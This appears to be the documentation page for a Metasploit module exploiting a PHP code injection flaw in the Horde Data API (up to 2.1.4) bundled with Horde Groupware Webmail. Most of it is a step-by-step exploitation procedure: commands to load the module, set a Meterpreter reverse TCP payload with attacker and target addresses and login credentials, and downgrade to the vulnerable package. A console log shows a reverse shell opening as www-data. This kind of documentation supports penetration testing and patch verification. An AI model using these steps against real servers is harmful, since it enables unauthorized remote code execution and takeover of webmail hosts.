Andrea Cardaci
2.1 KiB
2.1 KiB
Vulnerable Application
The Horde project comprises several standalone applications and libraries, the Horde Groupware Webmail Edition suite (tested version 5.2.22) bundles several of them by default, among those, Data (Horde Data API) is a library used to manage data import/export in several formats, e.g., CSV, iCalendar, vCard, etc. This library up to version 2.1.4 (included) is vulnerable to PHP code injection.
Find more information in the original advisory.
Verification Steps
- Install the application (see below)
- Start msfconsole
- Do:
use exploit/multi/http/horde_csv_rce - Do:
set payload php/meterpreter/reverse_tcp - Do:
set lhost [ATTACKER IP] - Do:
set rhost [TARGET IP] - Do:
set username [username] - Do:
set password [password] - Do:
exploit - A session should open
Downgrade the Horde Data API package if needed:
pear uninstall --ignore-errors horde/horde_data-2.1.5
pear install --ignore-errors horde/horde_data-2.1.4
Scenarios
Horde Groupware Webmail Edition 5.2.22 with Horde Data API 2.1.4 on Debian GNU/Linux 9
msf5 > use exploit/multi/http/horde_csv_rce
msf5 exploit(multi/http/horde_csv_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/horde_csv_rce) > set lhost 192.168.1.69
lhost => 192.168.1.69
msf5 exploit(multi/http/horde_csv_rce) > set rhost 192.168.1.69
rhost => 192.168.1.69
msf5 exploit(multi/http/horde_csv_rce) > set username alice
username => alice
msf5 exploit(multi/http/horde_csv_rce) > set password alice
password => alice
msf5 exploit(multi/http/horde_csv_rce) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (38288 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:44524) at 2020-03-14 14:55:17 +0000
meterpreter > getuid
Server username: www-data (33)